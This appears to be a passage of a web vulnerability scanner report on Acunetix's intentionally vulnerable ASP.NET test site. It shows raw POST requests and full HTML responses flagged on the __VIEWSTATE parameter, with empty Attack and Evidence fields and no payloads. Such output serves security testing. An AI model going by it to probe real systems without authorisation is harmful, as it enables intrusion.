Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8303&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgCAvuOIntoIZGRk1bidnuY0xLWUStPH30CaY5r90o0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLx7JTfBALiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gJBPhdVWKpA0VyRtwDRsJI9zK%2B9fg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:43:27 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgCAvuOIntoIZGRk1bidnuY0xLWUStPH30CaY5r90o0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLx7JTfBALiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gJBPhdVWKpA0VyRtwDRsJI9zK+9fg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:White" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8319&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgCAWoobq9oIZGRkYtTlnxJY%2B6yxzaZCn5pY%2FBJcV2k%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKg1NT2AQLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gL1zlTCygVYL%2BcDGxnk6Mz70OPzNA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:23:25 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgCAWoobq9oIZGRkYtTlnxJY+6yxzaZCn5pY/BJcV2k=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKg1NT2AQLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gL1zlTCygVYL+cDGxnk6Mz70OPzNA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:White" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
